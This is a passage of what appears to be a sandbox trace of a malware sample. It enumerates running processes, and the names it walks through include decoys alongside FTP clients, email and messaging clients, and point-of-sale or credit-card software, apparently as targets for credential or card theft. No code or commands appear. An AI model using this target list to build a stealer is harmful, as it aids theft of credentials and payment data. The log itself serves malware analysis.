th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0227.422] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0227.424] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0227.426] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0227.429] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0227.432] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0227.434] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0227.438] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0227.440] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0227.443] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0227.445] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0227.448] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0227.451] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0227.453] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0227.455] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0227.468] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0227.471] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0227.473] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0227.476] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0227.479] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0227.481] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0227.484] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0227.488] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0227.491] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0227.493] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0227.497] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0227.500] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0227.502] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0227.507] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0227.510] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0227.512] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0227.515] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0227.517] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0227.520] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0227.523] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0227.525] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0227.528] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0227.530] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0227.533] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0227.535] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0227.538] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0227.552] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0227.554] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0227.557] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0227.559] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0227.562] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0227.565] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0227.567] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0227.569] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0227.573] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0227.575] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0227.578] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0227.580] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0227.583] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0227.586] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0227.602] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0227.605] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0227.607] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0227.610] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0227.612] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0227.614] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0227.617] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0227.619] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0227.621] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.624] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0227.626] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0227.628] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.630] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0227.632] CloseHandle (hObject=0x2218) returned 1 [0227.632] Sleep (dwMilliseconds=0x64) [0227.744] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f4 [0227.759] Process32First (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.762] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0227.764] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0227.766] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.769] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0227.771] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.773] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0227.775] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0227.777] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0227.834] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.836] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.838] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0227.840] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.844] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.846] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.848] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.850] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 